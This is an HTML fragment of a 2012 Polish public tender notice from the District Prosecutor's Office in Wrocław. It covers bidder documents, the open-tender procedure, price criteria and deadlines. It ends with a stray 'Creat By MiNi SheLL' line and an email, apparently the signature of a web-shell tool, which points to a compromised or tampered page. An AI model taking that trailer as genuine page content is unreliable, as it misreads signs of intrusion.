<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany formularz Oferty wg Załącznika nr 1 do SIWZ
2. arkusz kalkulacyjny na usługi ochrony wg Załącznika nr 5 do SIWZ
3. dowód wpłaty wadium
4. zaakceptowany projekt umowy, której wzór stanowi Załącznik nr 8 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany umowy w przypadku ustawowej zmiany stawki podatku od towarów i usług. Zmiana wymaga zawarcia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.prokuratura.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa we Wrocławiu, 50-950 Wrocław ul. Podwale 30 pok. nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 11:00, miejsce: Prokuratura Okręgowa we Wrocławiu, 50-950 Wrocław ul. Podwale 30 pok. nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com